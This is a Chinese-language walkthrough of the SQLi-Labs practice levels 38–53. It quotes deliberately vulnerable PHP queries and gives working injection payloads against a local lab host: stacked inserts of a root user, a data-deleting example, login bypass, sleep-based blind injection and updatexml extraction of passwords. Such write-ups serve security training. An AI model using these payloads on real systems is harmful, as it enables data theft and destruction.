SQLi-LABS3

Less-38

堆叠查询

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{


/* store first result set */
if ($result = mysqli_store_result($con1))
{
if($row = mysqli_fetch_row($result))
{
echo '<font size = "5" color= "#00FF00">';
printf("Your Username is : %s", $row[1]);
echo "<br>";
printf("Your Password is : %s", $row[2]);
echo "<br>";
echo "</font>";
}
// mysqli_free_result($result);
}
/* print divider */
if (mysqli_more_results($con1))
{
//printf("-----------------\n");
}
//while (mysqli_next_result($con1));
}
else
{
echo '<font size="5" color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</font>";
}
/* close connection */
mysqli_close($con1);


}

tips:
在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select * from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。
answer:

1
http://192.168.3.7/sqli/Less-38/?id=1';insert into users(id,username,password) values (120,'root','root')--+

Less-39

整形堆叠查询

Less-40

同上,’)闭合,并且错误不回显

Less-41

同上,无闭合,错误不回显

Less-42

登录密码输入框那里存在堆叠注入

1
2
username=a' or 1#
password=a

登录失败,下面换成password试试:

1
2
username=a
password=a' or 1#

登录成功,所以password没有经过过滤,所以在这进行构造

Less-43

跟上题一样思路,’)闭合

Less-44

与42关基本一样,区别在:没有回显信息

1
2
3
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

Less-45

且为 ‘) 闭合

Less-46

order by 延迟注入

1
2
3
4
$id=$_GET['sort'];	

$sql = "SELECT * FROM users ORDER BY $id";
$result = mysql_query($sql);

sort=1 desc 或者asc。显示的结果不同,所以可以注入
看看在MySQL 5中的SELECT语法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
SELECT 
[ALL | DISTINCT | DISTINCTROW ]
[HIGH_PRIORITY]
[STRAIGHT_JOIN]
[SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
[SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
select_expr [, select_expr ...]
[FROM table_references
[WHERE where_condition]
[GROUP BY {col_name | expr | position}
[ASC | DESC], ... [WITH ROLLUP]]
[HAVING where_condition]
[ORDER BY {col_name | expr | position}
[ASC | DESC], ...]
[LIMIT {[offset,] row_count | row_count OFFSET offset}]
[PROCEDURE procedure_name(argument_list)]
[INTO OUTFILE 'file_name' export_options
| INTO DUMPFILE 'file_name'
| INTO var_name [, var_name]]
[FOR UPDATE | LOCK IN SHARE MODE]]

盲注
基于时间的盲注

1
2
http://192.168.3.7/sqli/Less-46/?sort=if(1=1,sleep(3),1) %23
http://192.168.3.7/sqli/Less-46/?sort=if(1=2,sleep(3),1) %23

基于布尔的盲注

报错注入

1
http://192.168.3.7/sqli/Less-46/?sort=updatexml(1,substr(concat(0x23,(select group_concat(password) from users ),0x23),65,96),1)%23

Less-47

如上 ,单引号闭合

Less-48

order by 时间盲注

1
http://192.168.3.7/sqli/Less-48/?sort=if(1=1,sleep(3),1) %23

Less-49

同上 单引号闭合

Less-50

order by 堆叠查询

Less-51

堆叠查询

Less-52

堆叠查询

Less-53

堆叠查询